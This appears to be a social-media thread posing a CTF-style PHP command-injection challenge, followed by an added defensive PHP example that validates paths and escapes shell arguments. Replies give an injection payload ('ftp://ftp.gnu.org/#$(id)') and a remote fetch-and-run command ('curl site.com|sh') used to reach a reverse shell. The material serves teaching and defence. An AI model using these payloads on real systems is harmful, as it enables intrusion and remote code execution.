Had this on a recent engagement and thought I'd provide a cut-down version as a fun little CTF-like challenge.

As an attacker, you can invoke `pwnme()` and control the value of `$filename` via a web request.

You cannot control the contents of the file system that this code is running on. You don't have the ability to upload files.

How do you achieve command injection?

#php #challenge

@oj I'd go with something like:
`ftp://ftp.gnu.org/#$(id)`

@Bitquark @oj

This is such an elegant solution. One question: how do you catch the output of `id`? I have verified that this successfully bypasses the `file_exists` function; I just can't get this payload to a place where I can see the output.

@kevinfarrow @Bitquark My payload consisted of "curl site.com|sh" which allowed for anything to be run, including a reverse shell.
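
A defender's view of the pattern discussed in this thread, as an added example that is not part of any post above. The original `pwnme()` is not shown on the page, so this assumes it was an existence check followed by a shell command; `resolve_local_file()`, `count_bytes()`, the `wc -c` command and the demo directory are all hypothetical.

```php
<?php
// Added example (not code from the thread). Assumed pattern being hardened:
// "file_exists($filename)" used as validation before $filename reaches a shell.

function resolve_local_file(string $filename, string $baseDir): ?string
{
    // file_exists() is true for any stream wrapper that supports stat(),
    // ftp:// among them, so it says nothing about the path being local.
    // Reject scheme-prefixed input and NUL bytes before touching the file system.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $filename) || strpos($filename, "\0") !== false) {
        return null;
    }
    // realpath() resolves local paths only and returns false for missing ones.
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $filename);
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    // Containment check: the resolved path must stay under the base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

function count_bytes(string $filename, string $baseDir): ?string
{
    $path = resolve_local_file($filename, $baseDir);
    if ($path === null) {
        return null;
    }
    // escapeshellarg() single-quotes the value so $( ), backticks, | and ;
    // reach the program as literal characters; "--" ends option parsing.
    $out = shell_exec('wc -c -- ' . escapeshellarg($path));
    return is_string($out) ? trim($out) : null;
}

// Constructed demo inputs: one legitimate file, the URL form from the thread,
// a traversal attempt and a missing file.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pwnme_demo_' . getmypid();
@mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'report.txt', "hello\n");

foreach (['report.txt', 'ftp://ftp.gnu.org/#$(id)', '../../etc/passwd', 'missing.txt'] as $input) {
    $result = count_bytes($input, $base);
    printf("%-26s => %s\n", $input, $result ?? 'rejected');
}
```

Where the external program allows it, passing the command to `proc_open()` as an array (PHP 7.4 and later) avoids the shell entirely, which removes the need for escaping.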